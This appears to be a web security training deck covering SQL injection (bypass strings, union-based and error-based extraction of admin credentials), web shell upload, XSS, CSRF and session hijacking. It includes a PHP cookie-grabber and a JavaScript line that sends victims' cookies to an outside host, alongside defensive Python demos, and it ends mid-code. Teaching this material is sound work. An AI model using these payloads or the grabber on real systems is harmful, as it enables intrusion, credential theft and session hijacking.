
Web Security

Session Flow

Web Architecture
Security Misconceptions
Latest Threats on Web
SQL Basics
SQL Injection: Authentication Bypass
SQL Injection: Union Based
SQL Injection: Error Based
Control Panel
Uploading Control Panel
Privilege Escalation on Server
Analyzing Logs
XSS
Session Hijacking

Web Architecture
Web architecture is, at its simplest, a client-server model.
Every internet user is a client, and the web pages they view live on a
web server. One web server may host one or many websites.

Web Architecture
The client requests a page from the server and the server answers with
the appropriate data. That sounds simple, but in practice the request
passes through several servers, and the page is delivered only if every
hop responds positively.
Different types of server:
Application Server
Backup Server
Mail Server
DB Server
File Sharing & Printing Server
Web Server
Etc.

Security Misconceptions
"The firewall protects my web server and database"
The firewall must let ports 80 and 443 through, so the web server is
itself part of your external perimeter defence.
A vulnerability in the web server software or in a web application can
give an attacker a path to internal network resources, straight through
the firewall.

Security Misconceptions
"The IDS and IPS protect my web server and database"
An IDS is configured to detect the signatures of well-known attacks.
Those signatures do not cover attacks against your custom applications.
It logs events and user actions, but nobody can practically monitor
that volume of log data by hand.

Security Misconceptions
"SSL secures the website"
SSL secures the transport of data between the web server and the user's
browser.
SSL does not protect against attacks on the server or the applications
behind it; an injection payload travels over SSL just as well as a
legitimate request.
SSL is the attacker's best friend because of the false sense of security
it gives.

Latest Threats
The list below follows the OWASP Top 10 (2010 edition):
SQL Injection
Cross-Site Scripting (XSS)
Broken Authentication and Session Management
Insecure Direct Object References
Cross-Site Request Forgery (CSRF)
Security Misconfiguration
Insecure Cryptographic Storage
Failure to Restrict URL Access
Insufficient Transport Layer Protection
Unvalidated Redirects and Forwards

SQL Basics
SQL stands for Structured Query Language.
It is the language an application uses to talk to its database.

SQL Basics
The standard statements for data manipulation are:

SELECT Statement
INSERT INTO Statement
UPDATE Statement
DELETE Statement

All four statements are part of SQL DML (Data Manipulation Language).

SQL Basics
SQL also lets you operate on the tables themselves, i.e. define the data
structure:

CREATE TABLE
ALTER TABLE
DROP TABLE

These statements are part of SQL DDL (Data Definition Language).
(There is no DELETE TABLE statement: DROP TABLE removes a table, while
DELETE, a DML statement, removes rows from it.)

SQL Basics
SELECT reads data from a table.
INSERT INTO adds rows to an existing table.
UPDATE changes the values in one or more columns of existing rows.
DELETE removes rows from a table.

SQL Basics
Sample Database
The sample database is named NewsDB.
It contains one table, news, with four columns:

id
news_title
news_content
news_author

(The column names are written the way the sample queries below use them.)

SQL Basics
Sample Queries
Query : select * from news;
Returns every row and every column of the news table.

Query : select news_content from news;
Returns the news_content column for every row of the news table.

Query : select news_content, news_title from news;
Returns the news_content and news_title columns for every row.

SQL Basics
Sample Queries
Query : select news_content, news_title from news where id=3;
Returns news_content and news_title only for the row whose id column is 3.

Query : select * from news where id=3;
Returns all columns of the row whose id column is 3.

SQL Basics
Sample Scenario
There is a website, site.com. A website is nothing but a collection of
web pages, and one page of this site is
www.site.com/adminlogin.php
Assume the details behind the code are:
Database           : SiteDB
Table Names        : userlogin, adminlogin, news, etc.
adminlogin Columns : adminid, pass

SQL Basics
To log in through adminlogin.php, the admin enters an adminid and a
password, and a query is run against the adminlogin table. The query
looks something like this (the application wraps each value in single
quotes):
select * from adminlogin where adminid='<value>' and pass='<value>';
i.e. : select * from adminlogin where adminid='admin' and pass='adminpass';
If the username and password are correct the query returns a row and
the admin is logged in with username admin and password adminpass.

SQL Injection
SQL injection means injecting SQL syntax into a query the website builds
from user input. With a malicious input an attacker can:
Bypass the authentication
Map the structure of the database
Read sensitive data

We divide SQL injection methods into three parts:
Authentication Bypass
Union Based Injection
Error Based Injection

Authentication Bypass
Sample Scenario (recap)
Same site as before: www.site.com/adminlogin.php, database SiteDB,
table adminlogin with columns adminid and pass.
The login query is:
select * from adminlogin where adminid='<value>' and pass='<value>';
i.e. : select * from adminlogin where adminid='admin' and pass='adminpass';
If the username and password are correct the admin is logged in;
otherwise the query returns no row and the page shows an error such as
"Invalid username and password".

Authentication Bypass
But what if someone passes   ' or '0'='0   as the password?
Whatever we pass as a value is placed between two single quotes, i.e.
'<value>', so the query becomes:
select * from adminlogin where adminid='admin' and pass='' or '0'='0';

Authentication Bypass
There was already an opening single quote before our value; the first
character of our string closes it, and the application's own closing
quote ends the final literal '0'. Everything in between is now SQL
syntax, not data.

Authentication Bypass
Because AND binds tighter than OR, the database reads the WHERE clause as
(adminid='admin' and pass='') or ('0'='0')
The condition '0'='0' is always true, so every row matches, the
application takes the first row returned, and authentication is bypassed!
The same string can be tried as the username, or as both, if needed.
Any always-true comparison works in place of 0=0, e.g. 1=1 or 'X'='X':
' or '1'='1
' or 'X'='X
The slides cite surveys claiming that more than 65% of websites were
still vulnerable to this injection at the time.

Authentication Bypass
Sample Keywords
(The original slide listed each payload in several quote variants; the
single-quote forms are shown here. Replace ' with " where the
application wraps values in double quotes, and drop the quotes entirely
where the value is numeric and not quoted, e.g.   or 1=1  )

' or '1'='1
' or 'x'='x
' or 0=0 --
' or 0=0 #
') or ('x'='x
' or 1=1 --
' or 'a'='a
') or ('a'='a
hi' or 'a'='a
hi' or 1=1 --
' or 1=1 --'
Note: -- and # start a comment (MySQL needs a space after --), so
anything the developer appended after the injected value is discarded.
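As an added example (not from the original slides), here is the login query from the sample scenario implemented against an in-memory SQLite database, first built by string concatenation as the slides describe and then with bound parameters. The sample row (admin/adminpass) is constructed from the slide's scenario; the function names and the choice of SQLite are assumptions for the demo. The payloads that bypass the concatenated query fail against the parameterized one because the driver never lets a quote in the input end the string literal.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for SiteDB.adminlogin
    (schema from the slides; the row values are our own assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE adminlogin (adminid TEXT, pass TEXT)")
    db.execute("INSERT INTO adminlogin VALUES ('admin', 'adminpass')")
    return db


def vulnerable_login(db, adminid, pw):
    """Builds the query the way the slides describe: the raw input is
    pasted between single quotes. Returns True when any row matches."""
    sql = ("SELECT * FROM adminlogin WHERE adminid='%s' AND pass='%s'"
           % (adminid, pw))
    return db.execute(sql).fetchone() is not None


def safe_login(db, adminid, pw):
    """Same query with bound parameters: the values travel separately
    from the SQL text, so a quote in the input cannot close the literal."""
    sql = "SELECT * FROM adminlogin WHERE adminid=? AND pass=?"
    return db.execute(sql, (adminid, pw)).fetchone() is not None


# The slides' bypass strings, quotes restored. Each either closes the
# literal and adds an always-true OR, or comments out the rest of the query.
PAYLOADS = [
    "' or '0'='0",
    "' or 1=1 --",
    "x' or 'a'='a",
]


def run_demo(username="nobody"):
    """Tries every payload as the password with a username that does not
    exist. Returns {payload: (vulnerable_result, safe_result)}."""
    db = make_db()
    return {p: (vulnerable_login(db, username, p), safe_login(db, username, p))
            for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (vuln, safe) in run_demo().items():
        print("%-16r concatenated=%s parameterized=%s" % (payload, vuln, safe))
```

Every payload logs in through the concatenated query even with a non-existent username, because the WHERE clause collapses to an always-true condition; the parameterized query simply looks for a user whose password is literally the payload string and finds none.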

Union Based Injection

With authentication bypass we were guessing that the username is admin
or administrator, or passing the malicious string in both fields. But
the username is not always admin or administrator, and the bypass itself
can be fixed. If an attacker still wants in, the data has to be read out
of the database.
Union based injection does that: the attacker appends a malicious SELECT
to the website's own query, and the combined result discloses sensitive
data from the database.

Union Based Injection

The web application sends a query to the database and displays the data
the database returns. An attacker who can append a second query to the
application's query gets its results displayed in the same page.

Union Based Injection

Union based injection relies on a few core SQL statements and objects,
so some basics of SQL are needed once again.
SQL Basics
information_schema: the information database, which stores metadata
about all the other databases the MySQL server maintains. We read it
through its own tables, chiefly tables and columns.
information_schema.tables : one row per table, including table_name and
table_schema (the database the table belongs to).
information_schema.columns : one row per column, including column_name
and the table_name it belongs to.

UNION operator: UNION combines the result sets of two or more SELECT
statements. Each SELECT must return the same number of columns. UNION
drops duplicate rows (UNION ALL keeps them), i.e.
a = {1,2,3,4}
b = {1,2,3,4,5,6,7}
a UNION b = {1,2,3,4,5,6,7} : all the data, repetition avoided.

Union Based Injection

Bollywood                  Hollywood
E_ID  E_Name               E_ID  E_Name
1     Vidit Baxi           1     Vidit Baxi
2     Shahrukh Khan        2     Jim Carrey
3     John Abraham         3     Daniel Craig

Now we want to list all the different actors from Bollywood and
Hollywood, so we use the following SELECT statement:
E.g.: SELECT E_Name FROM Bollywood
      UNION
      SELECT E_Name FROM Hollywood
The result-set will look like this:
E_Name
Vidit Baxi
Shahrukh Khan
John Abraham
Jim Carrey
Daniel Craig
(Vidit Baxi appears in both tables but only once in the result.)

Union Based Injection

The ORDER BY keyword: ORDER BY sorts the result-set by a specified
column, in ascending order by default; add DESC for descending order.
Bollywood
E_ID  E_Name
2     John Abraham
1     Vidit Baxi
4     Shahrukh Khan
3     Shahid Kapoor

E.g. : select * from Bollywood ORDER BY E_ID;
Result-set will look like this:
E_ID  E_Name
1     Vidit Baxi
2     John Abraham
3     Shahid Kapoor
4     Shahrukh Khan

Union Based Injection

Attackers follow the steps below.
Step:1 Find a something=something parameter in the URL, e.g. id=4,
page=2, catid=1, info=9, product=car:
http://www.site.com/product.php?id=4
http://www.site1.com/list.php?catid=3
http://www.site2.com/product.php?product=car
These parameters are used to fetch data from the database, so the
attacker can pass a malicious query through them.

Union Based Injection

After finding something=something, append a single quote ('). It will
look somewhat like:
http://www.site.com/product.php?id=4'
http://www.site1.com/list.php?catid=3'
http://www.site2.com/product.php?product=car'
If the page then
generates an error, or
shows a blank page, or
is missing some data,
it may be vulnerable to union based SQL injection.
(Screenshot in the original: the blank page after the quote.)

Union Based Injection

Step:2 Append   order by 1 --   (without the quote from step 1)
i.e.:
http://www.site.com/product.php?id=4 order by 1 --
http://www.site1.com/list.php?catid=3 order by 1 --
http://www.site2.com/product.php?product=car order by 1 --
If the page loads normally, proceed to order by 2 --, then order by 3 --,
and so on until you see an error, a blank page or missing data.

Union Based Injection

Here -- begins a comment, so whatever the developer appended after our
value in the query is commented out and does not execute. (MySQL needs
a space after --, and browsers trim a trailing space from a URL, so in a
URL write it as -- - or --+.)
Order by 1 -- || Normal Load
Order by 2 -- || Normal Load
Order by 3 -- || Normal Load
Order by 4 -- || Normal Load
Order by 5 -- || Error
Ordering by a column number that does not exist fails, so the error at 5
means the query selects 4 columns.

Union Based Injection
(Screenshots in the original: the page loading normally, then with
order by 1 -- through order by 4 --, then the error at order by 5 --.)
Here order by 5 -- gives an error, so 4 columns are used to display the
data.

Union Based Injection

The error at order by 5 means 4 columns are fetched from the database.
Now we UNION our own SELECT onto the query to find which of them is
displayed (the visible column).
Step:3 union select 1,2,3,4 --
Note: we got the error at order by 5, which is why it is union select
1,2,3,4; had the error come at 10 it would be union select
1,2,3,...,9,10 --
i.e. :
http://www.site.com/product.php?id=4 union select 1,2,3,4 --
http://www.site1.com/list.php?catid=3 union select 1,2,3,4 --
http://www.site2.com/product.php?product=car union select 1,2,3,4 --

Union Based Injection

If no column number shows up on the page, the page is rendering only the
first row of the result, which is still the original record (id=4).
Make the original part of the query match nothing, e.g. by negating the
id, so that our UNION row is the first (and only) row displayed:
http://www.site.com/product.php?id=-4 union select 1,2,3,4 --
http://www.site1.com/list.php?catid=-3 union select 1,2,3,4 --
http://www.site2.com/product.php?product=-car union select 1,2,3,4 --

Union Based Injection
(Screenshot in the original: the page showing the number 2.)

The visible column number is 2, so we can replace that 2 with:
database()  : returns the name of the current database.
version()   : returns the MySQL version.
user()      : returns the database user the application connects as.
table_name  : selected from information_schema.tables to list table names.
column_name : selected from information_schema.columns to list column
names. Etc.

Union Based Injection

Step:4 Check the version, database or user:
union select 1,version(),3,4 --
OR
union select 1,database(),3,4 --
OR
union select 1,user(),3,4 --

These return the MySQL version, the database name and the database user.
i.e. :
http://www.site.com/product.php?id=4 union select 1,version(),3,4 --
http://www.site2.com/list.php?catid=3 union select 1,version(),3,4 --
http://www.site1.com/product.php?product=car union select 1,version(),3,4 --
(Screenshots in the original: the version, database and user values
rendered in column 2.)

Union Based Injection

Step:5 List the table names:
http://www.site.com/product.php?id=5 union select 1,2,table_name,4
from information_schema.tables --
(Screenshot in the original: the first table name.)
Sometimes the page shows all the table names, but usually only the first
row is rendered, so you get only the first table. To get all the table
names together use group_concat(), which joins them into one value:
http://www.site.com/product.php?id=5 union select
1,2,group_concat(table_name),4 from information_schema.tables --
(Screenshot in the original: all the table names.)
Add   where table_schema=database()   to leave out the MySQL system
tables and list only the current database's tables.

Union Based Injection


You need to look for the appropriate table like, admin,
admindata, login, user, adminlogin, logindata, logininfo,
tbladmin, admintable, tbl_admin etc etc etc

Union Based Injection

Step:6 Find the column names of the table:
http://www.site.com/products.php?id=5 union select
1,2,column_name,4,5 from information_schema.columns where
table_name='tbl_admin' --
(This second example site has 5 columns; use the count you found in
step 2.)

Union Based Injection

Sometimes single quotes (') are filtered, so the table name cannot be
written as a string. Convert each character to its decimal code and pass
the codes through char(), which MySQL accepts in place of the string.
i.e. : admin is passed as char(97,100,109,105,110)
here 97 = a, 100 = d, 109 = m, 105 = i, 110 = n
In the original's screenshot the table was named table_admin (95 is the
underscore):
http://www.site.com/products.php?id=5 union select
1,2,column_name,4,5 from information_schema.columns where
table_name=char(116,97,98,108,101,95,97,100,109,105,110) --
(Screenshots in the original: one column name, then all the columns
using group_concat(column_name) in the visible column.)

Union Based Injection

Step:7 Get the data from the table:
http://www.site.com/products.php?id=5 union select 1,2,adminid,4 from
admin --
To read the username and password together in one value, use
group_concat(adminid,0x3a,pass) in the visible column (0x3a is the
colon separator).
(Screenshot in the original: the username and password.)
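As an added example (not from the slides), the seven steps above run end to end against a constructed SQLite database: a product table behind a page that only renders its second column, and a tbl_admin table to steal. SQLite has no information_schema, so sqlite_master stands in for information_schema.tables and the stored CREATE statement for information_schema.columns; on MySQL the metadata queries are the ones shown in steps 5 and 6. Table, column and function names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed sample database (our assumption, not from the slides)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (id INTEGER, name TEXT, price TEXT, descr TEXT)")
    db.execute("INSERT INTO product VALUES (4, 'car', '9999', 'a red car')")
    db.execute("CREATE TABLE tbl_admin (adminid TEXT, pass TEXT)")
    db.execute("INSERT INTO tbl_admin VALUES ('admin', 'adminpass')")
    return db


def vulnerable_page(db, id_param):
    """Models product.php?id=<id_param>: the parameter is pasted into the
    SQL unquoted, as in the slides' numeric-id examples. The page renders
    only column 2 (name) of each row, so that is what we return."""
    sql = "SELECT id, name, price, descr FROM product WHERE id=" + id_param
    return [row[1] for row in db.execute(sql).fetchall()]


def count_columns(db, base_id="4", limit=20):
    """Step 2: ORDER BY n loads normally until n exceeds the column count;
    the first n that raises an error is one past the real count."""
    for n in range(1, limit + 1):
        try:
            vulnerable_page(db, f"{base_id} ORDER BY {n} --")
        except sqlite3.OperationalError:
            return n - 1
    return None


def find_visible_column(db, ncols, base_id="-4"):
    """Step 3: UNION SELECT '1','2',...,'n' with an id that matches nothing
    (-4), so our row is the only one rendered; the marker that shows up
    is the visible column."""
    markers = ",".join(f"'{i}'" for i in range(1, ncols + 1))
    shown = vulnerable_page(db, f"{base_id} UNION SELECT {markers} --")
    return int(shown[0]) if shown else None


def union_extract(db, ncols, visible, expr, base_id="-4"):
    """Steps 4-7: put one expression in the visible column and keep the
    other columns as plain numbers so the column count still matches."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[visible - 1] = expr
    shown = vulnerable_page(db, f"{base_id} UNION SELECT {','.join(cols)} --")
    return shown[0] if shown else None


def dump_admin(db):
    """Runs the whole procedure and returns
    (column count, visible column, table list, target DDL, credentials)."""
    ncols = count_columns(db)
    visible = find_visible_column(db, ncols)
    # step 5: group_concat of table names (sqlite_master ~ information_schema.tables)
    tables = union_extract(db, ncols, visible,
        "(SELECT group_concat(name) FROM sqlite_master WHERE type='table')")
    # step 6: column names; SQLite keeps the CREATE statement instead of a columns view
    ddl = union_extract(db, ncols, visible,
        "(SELECT sql FROM sqlite_master WHERE name='tbl_admin')")
    # step 7: the data itself, joined with a colon like group_concat(adminid,0x3a,pass)
    creds = union_extract(db, ncols, visible,
        "(SELECT group_concat(adminid||':'||pass) FROM tbl_admin)")
    return ncols, visible, tables, ddl, creds


if __name__ == "__main__":
    print(dump_admin(make_db()))
```

Each probe is a separate request, exactly as in the browser walk-through; the negative id is what makes the UNION row land in the rendered slot, and the scalar subquery in the visible column is how a single displayed field carries an arbitrary value out of the database.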

Error Based Injection

Error based SQL injection is more interesting. In union based injection
we fetched data through information_schema and displayed it in a visible
column. The logic of error based injection is to fetch the data through
the database's error messages: we pass a query that cannot execute
properly, and the error it raises contains the value we asked for. It is
generally used against sites written in ASP or ASPX, whose backend is
usually Microsoft SQL Server; the convert() trick below is SQL Server
syntax.

Error Based Injection

The web application requests data from the database and displays what
comes back. An attacker inserts a query that deliberately fails, and
reads the data out of the error message the page shows.

Error Based Injection

Step:1 Find something=something in the URL, e.g. id=4, page=2,
catid=1, info=9, product=car:
http://www.site.com/product.aspx?id=4
http://www.site1.com/list.aspx?catid=3
http://www.site2.com/product.aspx?product=car
These parameters fetch data from the database, so the attacker can pass
a malicious query through them.
Append a single quote ('):
http://www.site.com/product.aspx?id=4'
http://www.site1.com/list.aspx?catid=3'
http://www.site2.com/product.aspx?product=car'

Error Based Injection

If this generates an error, the page may be vulnerable to error based
SQL injection. (Screenshots in the original: the normal page, then the
database error after the single quote.) An error means we may be able to
inject our queries.

Error Based Injection

Step:2 Look for the table name:
http://www.site.com/product.aspx?id=4 and 1=convert(int,(select top 1
table_name from information_schema.tables)) --

The injected part is:
and 1=convert(int,(select top 1 table_name from information_schema.tables))

We can divide it into 3 parts:
1st part : select top 1 table_name from information_schema.tables
2nd part : convert(int,(1st part))
3rd part : and 1=(2nd part)

Error Based Injection

The 1st part,
select top 1 table_name from information_schema.tables
selects the first table listed in information_schema.tables (TOP 1 is
SQL Server's way of taking one row). In the example the selected table
name is users.

Error Based Injection

The 2nd part,
convert(int,(1st part))
tries to convert the selected table name to an integer. A name made of
letters cannot be converted, so SQL Server raises a conversion error that
quotes the offending value (that is what we want!).
Sometimes a table name is numeric, like 1234. It converts cleanly, so
there is no error to read; the 3rd part,
and 1=convert(int,(1st part))
then simply compares 1234 with 1, which is false, and the page loads
without its original record. No error is raised in that case, so the
name has to be excluded with the not in() list shown next and the query
re-run for the following table.

Error Based Injection

So the final logic is: the conversion fails, and the table name arrives
in the error message.

Error Based Injection

In the error we got the 1st table name; call it tbl-1.

To get the 2nd table name we exclude the first with a where condition:
http://www.site.com/product.aspx?id=4 and 1=convert(int,(select top 1
table_name from information_schema.tables where table_name not in('tbl-1'))) --

Error Based Injection

The main part of the query is
where table_name not in('Table-1')
not in() works like != for a list: the named tables are excluded, so
top 1 now points to the next table.

To see the 3rd table, extend the list:
where table_name not in('Table-1','Table-2')
and so on, adding each name you have already recovered.

Error Based Injection

Once you find an interesting table name, the next step is to fetch its
column names.
Step:3 Fetch the column names
http://www.site.com/product.aspx?id=4 and 1=convert(int,(select top 1
column_name from information_schema.columns where
table_name='Table-1')) --

To fetch the second column, exclude the first the same way:
http://www.site.com/product.aspx?id=4 and 1=convert(int,(select top 1
column_name from information_schema.columns where
table_name='Table-1' and column_name not in('col1'))) --

Error Based Injection

After fetching the table name and column names we can fetch the data.
Step:4 Get the data
http://www.site.com/product.aspx?id=4 and 1=convert(int,(select top 1
Col1 from Table)) --
This returns the first value of Col1 in the error; exclude values already
seen with   where Col1 not in('Data 1')   to walk through the remaining
rows, exactly as for table and column names.

Control Panel
Control panels come in 3 types.
Domain Control Panel: whenever one buys a domain, the domain provider
assigns a control panel where you can add, edit and delete domain
related resources such as DNS records and sub-domains.
Hosting Control Panel: whenever one buys hosting space for the website,
the hosting provider assigns a control panel where you can add, edit and
delete the pages of the website.

Control Panel
Admin Control Panel: whenever one creates a website, the developer adds
a page for content management where one can add, edit and delete the
data.

Control Panel
After gaining access to the website, an attacker tries to reach the
admin control panel, from which data can be added, edited, deleted and
modified.
A white hat may stop there, but a black hat may delete data and even
upload a control panel of their own. Such a panel can harm not just one
website: if the attacker gains root access on the server, every website
hosted there can be defaced or have its database tampered with.

Control Panel
(Screenshots in the original: a domain control panel, a hosting control
panel and an admin panel.)

Control Panel
Understanding the control panel is one of the most important parts of
web security. A control panel comes with a good number of options, and
one needs to choose the appropriate option for the website.

Control Panel
Account Management holds the admin's user account information.
Domain Manager lets the admin edit sub-domains.
File Manager lets the admin upload files via the online file manager or
via FTP, and add, edit and delete pages.

Control Panel
Statistics shows the account statistics.
The hosting provider may also supply software for your website.
Sometimes the hosting control panel and domain control panel are the
same, in which case it also lets you edit records such as MX and CNAME.

Control Panel
Site Management lets the user take backups and sometimes schedule them.
When registering the website one gets email addresses; Email Management
manages those accounts.
The website may have a database; one can upload and edit it under
Database Management.

Control Panel
Online File Manager
The online file manager is used to upload the pages. Here htdocs is the
folder that holds all the site's files.

Control Panel
In the gaining-access phase the attacker breaks into the website and
reaches the control panel. To keep that access, the attacker uploads a
control panel of their own, a hacker control panel.
Hacker control panels work like ordinary control panels and are known as
shells (web shells).
From a shell the attacker can reach the database, upload content, execute
commands on the server, delete existing files, edit the source of the
pages and deface the website.
The attacker may also escalate to root on the server, which allows
attacking the other websites hosted on the same server.

Control Panel
Shells differ between the Windows and Linux platforms.
For Windows, attackers use, among others:
k shell
ASP shell
Devilz shell

For Linux:
b374k shell
c99 shell
r57 shell
b64 shell
(Screenshots in the original: the b374k, c99, devilz, k and r57 shells.)

Uploading Control Panel

To upload a shell, the attacker needs access to the admin control panel
and an upload feature: news, video or image gallery sections are usually
built with an option to upload new content, and the shell is uploaded
through one of them.
(Screenshots in the original: the admin panel, the upload option and the
uploaded content.)

XSS
XSS, Cross Site Scripting.
A very frequently found vulnerability that lets an attacker inject
client-side scripts into a website.
The attacker sends another user a link to the vulnerable website carrying
the malicious script; the victim's browser treats every script on the
page as coming from the trusted site and runs it, and the victim is
compromised.
It is generally found in search boxes, shout boxes, comment boxes and the
like, and can be found the same way we find SQL injections: by passing
input through the page and watching what comes back.

XSS
To verify whether a website is vulnerable to XSS, try one of the
following in the search box or comment box:
<script>alert('Vidit')</script>
or
<script>alert("Vidit")</script>
or
<script>alert(0)</script>

If the page loads with the alert box, the website is vulnerable to XSS.
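As an added example (not from the slides), the reflected search-box case in Python: the page the slide's probe payloads would come back in, the same page with HTML entity encoding applied, and the link an attacker would send for reflected XSS. The page template, the search URL and the function names are assumptions.

```python
import html
from urllib.parse import quote

# Constructed probe payloads: the three from the slide, quotes restored.
PROBES = [
    "<script>alert('Vidit')</script>",
    '<script>alert("Vidit")</script>',
    "<script>alert(0)</script>",
]

# Assumed page template for a search box that echoes the query term.
TEMPLATE = "<html><body><h1>Results for: {q}</h1></body></html>"


def vulnerable_search_page(q):
    """Reflects the search term into the HTML untouched, so any tag in it
    becomes live markup and a <script> in it runs in the visitor's browser."""
    return TEMPLATE.format(q=q)


def safe_search_page(q):
    """Same page with HTML entity encoding; quote=True also turns ' and "
    into entities so the value is safe inside quoted attributes too."""
    return TEMPLATE.format(q=html.escape(q, quote=True))


def is_reflected_unescaped(render, payload):
    """The check the slide does by eye (an alert box pops up): does the
    payload come back verbatim, i.e. as markup rather than as text?"""
    return payload in render(payload)


def probe_all(render):
    """Runs every probe through a page renderer; True means vulnerable."""
    return {p: is_reflected_unescaped(render, p) for p in PROBES}


def reflected_link(base="http://www.site.com/search.php?q=", payload=PROBES[2]):
    """The URL an attacker sends a victim for reflected XSS: the payload
    URL-encoded into the query string of the vulnerable page (assumed URL)."""
    return base + quote(payload, safe="")


if __name__ == "__main__":
    print("vulnerable:", probe_all(vulnerable_search_page))
    print("escaped:   ", probe_all(safe_search_page))
    print(reflected_link())
```

html.escape is the right fix for text between tags and for quoted attribute values; a value written into a script block or an unquoted attribute needs the encoding for that context, which is why the check above is run against the renderer that actually produces the page.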

XSS
There is no single standardized classification of cross-site scripting
flaws, but primarily we divide XSS into 2 types:
1. Persistent XSS Vulnerability
2. Reflected XSS Vulnerability

1. Persistent XSS Vulnerability
When an attacker injects the malicious script, the website stores it
(for example as a comment) and it becomes part of the page source. So
every time anyone opens that page, the injected code runs as well.

XSS
2. Reflected XSS Vulnerability
Here, unlike the persistent case, the script is not stored by the
website; it is reflected back in the response to a single request, so it
lives only in the browser that made that request. The attacker sends the
victim a link to the website that carries the script in it, and along
with the page data the script is executed.

XSS
Sample Attacks

This client-side vulnerability can be exploited in many ways. To keep it
simple, here are some examples:
1. Cross Frame Scripting (XFS)
2. Cross Site Request Forgery (CSRF / XSRF)
3. DOM Based Attack
4. Session Hijacking

XSS
1. Cross Frame Scripting
Cross frame scripting is one of the dangerous outcomes of a cross site
scripting vulnerability.
The attacker uses an HTML iframe to load another website inside a frame
of the vulnerable website.
The attacker may also load a page of the same site, e.g. the login page
of a bank website.
The victim checks the URL, sees the trusted site and gets hacked.
Generally attackers prefer to load a phishing page in the frame.

XSS
As an example,
<iframe src="http://www.site.com"></iframe>

Assume site.com is the phishing page or a page of another website.
If the attacker submits this through the search box or comment box, then
once the page loads it also loads site.com inside the frame.

XSS
As in the example, an attacker can make a Pakistani website load a page
of an Indian website in a frame:
<iframe src="http://www.india.gov.in/"></iframe>

XSS
It was not loading properly, so we set the height and width of the frame:
<iframe src="http://www.india.gov.in" height="1000px" width="1000px"></iframe>
(A site can refuse to be framed by sending the X-Frame-Options header, in
which case no frame size will make it render.)

XSS
2. Cross Site Request Forgery (CSRF/XSRF)
A cross site request forgery vulnerability lets the attacker send the
victim a page that silently makes requests to another site in the
victim's name, and so compromise the victim's data.
The attacker can use an HTML img tag to load any image from any website.
In place of an image path the attacker can put a link to an action on
the target site; the victim's browser sends the request with the
victim's cookies, so the action runs in the victim's session.
The victim checks the URL, sees the trusted site and gets hacked.
Generally attackers prefer to plant a session-abusing request this way.

XSS
As an example,
<img src="http://www.site.com/images/image1.jpg" />

This loads an image from site.com into the page.

<img src="http://www.site.com/bank/transaction.do" />

This loads no image, but it may force the user to perform the
transaction if the user is already authenticated on that website.

XSS
As in the example, an attacker can make a Pakistani website load the
image of the Indian hero. (Screenshots in the original: the img tag and
the resulting page showing the image.)

XSS
In the same way the attacker can put a session-hijacking or any other
malicious request in the img src: instead of fetching an image, the
browser sends the attacker's request.
(Unlike XSS, CSRF needs no script to run on the target site, only a
request the browser will send with the victim's cookies; it is listed
here because an XSS hole is a convenient place to plant it.)

XSS
3. DOM Based Attack
DOM based XSS (type-0 XSS) is an XSS attack in which the attacker's code
runs because the page's own client-side script modifies the DOM of the
victim's browser using attacker-controlled data.
Sometimes web developers read a value from the URL and write it into the
page with client-side script. We can put the same kind of payload in
place of that value:
Eg: http://www.site.com/page.php?id=<iframe src="http://www.india.gov.in/"></iframe>
http://www.site.com/page.php?id=<img src="http://www.india.gov.in/images/image1.jpg" />
(If it is the server, rather than client-side script, that echoes the
parameter into the HTML, this is reflected XSS; the payload is the same.)

XSS
4. Session Hijacking
Session hijacking is one of the most dangerous attacks on web
applications.

In general terms, a web application uses sessions to keep track of
authenticated users; the session is checked on every request to verify
who the user is.
An attacker who grabs a user's session can present it to the same
website, be treated as that user and perform transactions in their name.

XSS
Session authentication works simply: when a user logs in, the server
issues a session identifier in a small cookie that the browser stores on
the user's computer. The server keeps the matching session record on its
side and uses it to validate the cookie on each request.

Authentication request to the server: (screenshot in the original)

XSS
The server responds to the request and sends the client-side cookie,
keeping the session record server-side.

An attacker who grabs the user's cookie can present it and be
authenticated against that server-side record.

XSS

To grab the cookie of an authenticated user, the attacker writes a script
that records whatever the victim's browser sends to it.

Cookie grabbing script coded in PHP (the original slide's code, with the
duplicated line removed and the chmod mode written in octal):

<?php
// Records what the injected JavaScript sends: victim IP, cookie, referrer, browser.
$ip       = $_SERVER['REMOTE_ADDR'];
$cookie   = $_GET['cookie'];
$referer  = $_SERVER['HTTP_REFERER'];
$browser  = $_SERVER['HTTP_USER_AGENT'];
$redirect = $_GET['redirect'];   // read but never used in the original
$data = "IP: " . $ip . "\n" . "Cookie: " . $cookie . "\n"
      . "Referrer: " . $referer . "\n" . "Browser: " . $browser . "\n\n";
$log = "cookies.txt";
@chmod($log, 0777);              // octal; the original's 777 is decimal (mode 1411)
$f = fopen($log, 'a');           // append one record per victim
fwrite($f, $data);
fclose($f);
@header("Location: http://www.google.com");   // bounce the victim so nothing looks odd
?>

XSS

The attacker uploads this script to a web server and uses JavaScript in
the XSS payload to send the victim's cookie to it:

javascript:document.location='http://www.site.com/grabber.php?cookie='.concat(escape(document.cookie));

As per our code, the cookie lands in cookies.txt. The attacker then sets
the stolen cookie (and, if the site checks it, the recorded referrer) in
their own browser while opening the website. The victim's session cookie
now acts as the attacker's client-side cookie, and the server-side
session record accepts it.
Note: document.cookie cannot read cookies marked HttpOnly, so a session
cookie set with that flag is out of reach of this particular grabber.
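As an added example (not from the slides), a check on which cookies the grabber above can actually obtain. The injected JavaScript relies on document.cookie, which never sees cookies flagged HttpOnly; the functions below parse constructed Set-Cookie headers and report what would reach cookies.txt, alongside the Secure and SameSite attributes a practitioner would also want set on a session cookie. Cookie names and values are assumptions.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie headers (assumed names/values), as a PHP site might
# send its session cookie: first without protections, then hardened.
WEAK = "PHPSESSID=a1b2c3d4; Path=/"
STRONG = "PHPSESSID=a1b2c3d4; Path=/; HttpOnly; Secure; SameSite=Strict"


def cookie_exposure(header):
    """For each cookie in a Set-Cookie header, report whether document.cookie
    (and so the grabber's JavaScript) can read it, whether the browser would
    send it over plain HTTP, and which SameSite policy it carries."""
    jar = SimpleCookie()
    jar.load(header)
    report = {}
    for name, morsel in jar.items():
        report[name] = {
            "readable_by_script": not bool(morsel["httponly"]),  # no HttpOnly flag
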